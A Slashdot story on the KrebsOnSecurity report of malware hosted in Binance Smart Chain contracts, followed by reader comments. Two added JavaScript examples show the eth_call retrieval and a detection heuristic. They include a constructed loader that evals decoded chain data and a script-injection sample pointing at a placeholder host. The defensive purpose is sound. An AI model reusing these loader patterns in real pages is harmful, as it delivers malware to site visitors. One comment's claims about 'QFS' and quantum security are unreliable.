Crime The Almighty Buck

Scammers Try Hosting Their Malware on a Binance Network (krebsonsecurity.com)

Breached web sites distribute malware to visitors by claiming they need to update their browser. But one group of attackers "have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement," reports security researcher Brian Krebs.

"By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain." [W]hen Cloudflare blocked those accounts the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain (BSC), a technology designed to run decentralized apps and "smart contracts," or coded agreements that execute actions automatically when certain conditions are met. Nati Tal, head of security at Guardio Labs, the research unit at Tel Aviv-based security firm Guardio, said the malicious scripts stitched into hacked WordPress sites will create a new smart contract on the BSC Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract's functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload.

"These contracts offer innovative ways to build applications and processes," Tal wrote along with his Guardio colleague Oleg Zaytsev. "Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted 'on-chain' without the ability for a takedown." Tal said hosting malicious files on the Binance Smart Chain is ideal for attackers because retrieving the malicious contract is a cost-free operation that was originally designed for the purpose of debugging contract execution issues without any real-world impact. "So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces," Tal said.

In response to questions from KrebsOnSecurity, the BNB Smart Chain (BSC) said its team is aware of the malware abusing its blockchain, and is actively addressing the issue. The company said all addresses associated with the spread of the malware have been blacklisted, and that its technicians had developed a model to detect future smart contracts that use similar methods to host malicious scripts. "This model is designed to proactively identify and mitigate potential threats before they can cause harm," BNB Smart Chain wrote. "The team is committed to ongoing monitoring of addresses that are involved in spreading malware scripts on the BSC. To enhance their efforts, the tech team is working on linking identified addresses that spread malicious scripts to centralized KYC [Know Your Customer] information, when possible."
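The "cost-free" retrieval Tal describes is a read-only contract call (eth_call) sent over ordinary JSON-RPC; the node simulates the call and returns the contract's return value as ABI-encoded hex, with no transaction and nothing written to the chain. The following is an added example, not code from Krebs, Guardio or the campaign: it shows the request shape and how a responder decodes a captured response to recover the loader for analysis. The endpoint URL, contract address, selector and response are all constructed placeholders.

```javascript
// Added example (not code from the Krebs or Guardio write-ups): what the
// "cost-free" retrieval looks like on the wire. An injected page script asks a
// BSC JSON-RPC endpoint to simulate a read-only contract call (eth_call) and
// gets the contract's return value back as ABI-encoded hex inside plain JSON.
// No transaction is sent and nothing is written on-chain, which is why the
// fetch leaves no trace in the ledger. The endpoint URL, contract address,
// selector and response below are CONSTRUCTED for illustration.

const RPC_URL = "https://bsc-rpc.example.invalid/"; // assumption: any public BSC JSON-RPC node
const CONTRACT = "0x" + "ab".repeat(20);            // constructed, not a real address
// A real selector is the first 4 bytes of keccak256(functionSignature);
// this one is a constructed placeholder.
const SELECTOR = "0xdeadbeef";

// JSON-RPC body a script would POST to read the contract. eth_call runs the
// contract on the node against the latest state and costs the caller no gas.
function buildEthCall(to, selectorHex, id = 1) {
  return {
    jsonrpc: "2.0",
    id,
    method: "eth_call",
    params: [{ to, data: selectorHex }, "latest"],
  };
}

// ABI encoding of a single `string` return value: word 0 is the byte offset of
// the string head (32), word 1 is the byte length, then the bytes zero-padded
// to a multiple of 32. Used here only to build the constructed sample response.
function encodeAbiString(s) {
  const bytes = Buffer.from(s, "utf8");
  const word = (n) => n.toString(16).padStart(64, "0");
  const body = bytes.toString("hex");
  const padded = body.padEnd(Math.ceil(body.length / 64) * 64, "0");
  return "0x" + word(32) + word(bytes.length) + padded;
}

// Inverse: pull the string out of an eth_call `result`, checking alignment and
// length so a truncated or malformed response fails loudly instead of yielding
// garbage an analyst might mistake for the payload.
function decodeAbiString(resultHex) {
  const hex = resultHex.startsWith("0x") ? resultHex.slice(2) : resultHex;
  if (hex.length < 128 || hex.length % 64 !== 0) {
    throw new Error("result is not a 32-byte-aligned ABI blob");
  }
  const word = (i) => hex.slice(i * 64, i * 64 + 64);
  const offset = parseInt(word(0), 16);
  if (offset % 32 !== 0) throw new Error(`bad head offset ${offset}`);
  const lenWordIdx = offset / 32;
  const length = parseInt(word(lenWordIdx), 16);
  const start = (lenWordIdx + 1) * 64;
  const data = hex.slice(start, start + length * 2);
  if (data.length !== length * 2) throw new Error("string data truncated");
  return Buffer.from(data, "hex").toString("utf8");
}

// What a responder does with a captured response: unwrap the JSON-RPC envelope
// and decode the ABI string to get the (still obfuscated) loader for analysis.
function extractPayload(rpcResponse) {
  if (rpcResponse.error) throw new Error(`RPC error: ${rpcResponse.error.message}`);
  if (typeof rpcResponse.result !== "string") throw new Error("no result field");
  return decodeAbiString(rpcResponse.result);
}

// Constructed stand-in for the obfuscated payload; not the campaign's real script.
const SAMPLE_PAYLOAD = "/* stage-2 loader placeholder */ console.log('stage2');";
const SAMPLE_RESPONSE = { jsonrpc: "2.0", id: 1, result: encodeAbiString(SAMPLE_PAYLOAD) };

// Builds the request a page would send and decodes the constructed reply.
function demo() {
  const request = buildEthCall(CONTRACT, SELECTOR);
  const payload = extractPayload(SAMPLE_RESPONSE);
  return { request, payload };
}

const DEMO = demo();
console.log("POST", RPC_URL, JSON.stringify(DEMO.request));
console.log("decoded payload:", DEMO.payload);
```

The defensive point is in the envelope, not the chain: the page talks to an HTTP endpoint that any proxy or egress control can see, and the decoded string is what you hand to a sandbox or deobfuscator. A real responder would take `result` from a captured response body rather than from the constructed one here.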

  • it finds innovative ways to be even more terrible.

    the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain

    All those megawatt-hours wasted on that...

    • by taustin ( 171655 )

      It's the gift that keeps on giving.

      Like any good STD.

    • by gweihir ( 88907 )

      That is not really new or innovative. The idea has been around for a long time. Using a "smart" contract makes it a bit more sophisticated, but essentially the idea of using the blockchain to host some illegal content is as old as the idea of a public distributed blockchain. I remember discussing this with other security folks a long time ago and we all agreed it was only a matter of time.

  • Makes one wonder (Score:4, Interesting)

    by ArmoredDragon ( 3450605 ) on Saturday October 21, 2023 @01:02PM (#63942235)

    Seems like it's hard to delete stuff from the ledger once it's out there. So what if somebody encoded illegal stuff like kiddie porn or pirated movies/music into the blockchain inside of tiny but nevertheless legitimate transactions? How do you get all of the nodes to agree to scrub older transactions?

    • by rsilvergun ( 571051 ) on Saturday October 21, 2023 @01:10PM (#63942257)
The people who are actually in charge of the blockchain would remove it. One of the dirty little secrets of blockchains and crypto is that they are not actually decentralized. Over time you get winners and losers just like in any other financial system and you end up with people who have a disproportionate amount of control over the chain. And that's just for the ones that were designed to be resistant to central control. Not familiar with the guts of the binance chain but a lot of these crypto chains are completely controlled by one organization and they just pretend to be decentralized. It's like a corporation where one guy owns 51% of the stock
      • The people who are actually in charge of the blockchain would remove it. One of the dirty little secrets of blockchains and crypto is that they are not actually decentralized.

        Have you looked at the source bitcoin code? I have (admittedly only scanning much of it) and I haven't seen a mechanism for actually removing past entries. Even if there was, it doesn't seem like it would work without seriously breaking things. If you send a transaction for some btc, and then subsequently move that btc again to yet another wallet, if you delete the first transaction then you end up with a situation where different nodes disagree about how much is in that second wallet, which breaks other th

      • So what if somebody encoded illegal stuff like kiddie porn or pirated movies/music into the blockchain inside of tiny but nevertheless legitimate transactions? How do you get all of the nodes to agree to scrub older transactions?

        The people who are actually in charge of the blockchain would remove it.

Cp was encoded on the Bitcoin Satoshi Vision (BSV) ledger https://www.bbc.com/news/techn... [bbc.com] I can't find any information suggesting it's been removed (they did remove an automatic browsing feature on their homepage so it wouldn't be displayed there).

        • I'm not 100% sure, but I think they only embedded URLs to CP. I don't think there was actual CP material in the blockchain itself (but again, I may be mistaken about this).

          • I'm not 100% sure, but I think they only embedded URLs to CP. I don't think there was actual CP material in the blockchain itself (but again, I may be mistaken about this).

            That was another case concerning the bitcoin (BTC) ledger. This was Bitcoin Satoshi Vision (BSV) where people could upload avatars to the homepage and write a message both which was encoded on the blockchain and was displayed on the homepage, so someone uploaded a cp avatar.

            • I could foresee some possible mechanisms of using embedding much larger amounts of data on to the blockchain.

              One way would be using a (reversed) linked-list style data structure. Essentially you chunk the file to be within the size constraints of the protocol, then post the first chunk, then post the next chunk starting with a pointer to the hash ID of the previous blockchain transaction, repeating until the entire file has been sent. Then you indicate the location of the file in the blockchain with nothing

              • Sounds workable to me. If i remember correctly BSV has a 100k message limit per transaction (BTC 100 char). I have no idea if there are protocols with an even higher limit.

      • You clearly have no idea how the blockchain works. You can't "remove" or "undo" a transaction without rolling back all transactions which happened since, and precisely no one would clobber a legit transaction to remove something illegal as that would instantly annihilate any value of the blockchain itself.

        The risk of a 51% attack comes from the ability to certify your own transactions. You can certify a change, but you can't certify faking previous transactions. I.e. Someone can say your wallet with address

  • They must educate users that the only way to officially update their browser is through the browser itself, and they should have a dedicated update button rather than the method of going to the about screen which isn't intuitive enough for beginners. Like I said before, help the millions of unemployed programmers get legitimate careers so they don't turn to scamming ones.
There are billions of people on this planet and a handful of malicious computers can do a lot of damage. This isn't really a problem you can fully solve with education and this is coming from me who loves educating people to solve social issues. The problem is that even if you only have a few percentage points of people who follow the scam you're going to have potentially large network problems because of how powerful even cheap laptop computers are and how fast broadband is even over relatively cheap Wi-Fi i
  • So, in other words, nothing has changed since day 1.
  • " the malicious scripts stitched into hacked WordPress sites will create a new smart contract on the BSC Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract's functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload."

    I'm frequently amazed at the ingenuity of scammers, and honestly, this is pretty fucking clever.

  • I believe that this is part of the features of these types of tools, to deliver payloads to computers to process, for all kinds of contract reasons.

    That's pretty cool.

    But how do you tell a malicious payload from a normal contract payload? That falls into the area that Apple and Google currently struggle with.

    • by gweihir ( 88907 )

      But how do you tell a malicious payload from a normal contract payload?

      Essentially impossible. Especially as you can do things like put encrypted content in one place and the key in another. The only real malware defense is to not run it. Everything else is half-measures that are more "hopeful engineering" than actual solutions.
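The question of telling a malicious contract read from an ordinary one can be narrowed in practice: on the page side, what distinguishes the loader Guardio describes from a dapp is not the contract data but the fact that data read from the chain flows into a code-execution sink. The following triage heuristic is an added example, not code from the article or from Guardio; the RPC hostname pattern and the three sample scripts are constructed.

```javascript
// Added example, not from the article or the Guardio research: a triage
// heuristic for page scripts. It does not judge whether a contract's return
// value is "malicious"; it flags scripts in which data read from a BSC
// contract (eth_call over JSON-RPC) reaches a code-execution sink, which is
// the shape of the loader the article describes. The RPC hostname pattern and
// all sample scripts below are CONSTRUCTED.

// Assumption: the public BSC JSON-RPC hostnames you care about. Replace with
// whatever your own egress telemetry shows.
const BSC_RPC_HOST = /bsc(-dataseed\d*)?\.(binance|bnbchain)\.org/i;

const INDICATORS = {
  rpc_call:   /["']eth_call["']/,                              // JSON-RPC read of a contract
  rpc_host:   BSC_RPC_HOST,                                    // talks to a known BSC node
  hex_decode: /fromCharCode|parseInt\s*\(.*?,\s*16\s*\)|atob\s*\(/, // turning ABI hex into text
  exec_sink:  /\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|setTimeout\s*\(\s*["']/,
};

// Verdict rules: a chain read feeding an execution sink is the loader shape
// ("high"); a chain read alone is normal dapp behaviour worth a look
// ("review"); an execution sink alone is far too common to act on ("none").
function scoreScript(src) {
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(src));
  let verdict = "none";
  if (hits.includes("rpc_call") && hits.includes("exec_sink")) verdict = "high";
  else if (hits.includes("rpc_call") || hits.includes("rpc_host")) verdict = "review";
  return { verdict, hits };
}

// Crude inline <script> extraction for a captured page; external scripts would
// have to be fetched and scored separately.
function scanPage(pageHtml) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(pageHtml)) !== null) bodies.push(m[1]);
  return bodies.map((body, index) => ({ index, ...scoreScript(body) }));
}

// Constructed samples. None of these is the real injected script.
const SAMPLES = {
  // a dapp reading a token balance: chain read, no execution sink
  dapp: `fetch("https://bsc-dataseed.binance.org/",{method:"POST",body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",params:[{to:TOKEN,data:SEL+pad(addr)},"latest"]})}).then(r=>r.json()).then(j=>render(BigInt(j.result)));`,
  // loader shape: chain read, hex-to-text, then eval of the result
  loader: `fetch(RPC,{method:"POST",body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",params:[{to:C,data:SEL},"latest"]})}).then(r=>r.json()).then(j=>{var h=j.result.slice(130),s="";for(var i=0;i<h.length;i+=2)s+=String.fromCharCode(parseInt(h.substr(i,2),16));eval(s);});`,
  // ordinary tag injection: no chain read at all
  tag: `(function(){var s=document.createElement("script");s.src="https://example.invalid/a.js";document.head.appendChild(s);})();`,
};

// A constructed page carrying the tag injector and the loader.
const PAGE = `<html><head><script>${SAMPLES.tag}</script></head><body><p>hi</p><script>${SAMPLES.loader}</script></body></html>`;

for (const [name, src] of Object.entries(SAMPLES)) {
  const { verdict, hits } = scoreScript(src);
  console.log(name.padEnd(7), verdict.padEnd(7), hits.join(","));
}
console.log(scanPage(PAGE));
```

This is triage, not a verdict, and it is trivially evaded by building the `eth_call` string at runtime or by relaying through an attacker-controlled proxy instead of a public node. Its value is in pairing it with the network side: an outbound POST to a chain RPC host from a WordPress page that has no dapp functionality is a strong signal on its own, and a Content-Security-Policy `connect-src` that does not list RPC hosts stops the fetch before any payload is decoded.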

  • At least to me. Attacks placing illegal content on public blockchains have been discussed for a long time, both for sabotaging the blockchain and for making that stuff available publicly. This is just a variant where the blockchain is used as a "bulletproof" hosting provider for malware.

  • Am I missing something here? The attack code appears to just have the client hitting a binance-provided API over perfectly normal HTTP to receive some JSON from a perfectly ordinary HTTP server that just happens to be providing the response based on the contents of a database. Sure, that database is 'the blockchain'; but (even if it is functionally immutable) there's absolutely nothing special stopping binance from replying to API requests however they like; or either endpoint or network security measures j
  • You can look at this as a trial-run on securing QFS or whatever networked banking platform.

The ultimate threat scenario is an .exe hidden in the message stream. Crypto only gets security so far due to its limiting factor - secret bit size. So whatever implications are derived on-chain directly apply in QFS world.

A hiccup for cashless even though quantum wants you to buy the narrative it's too good, too fast and immune to such an attack.
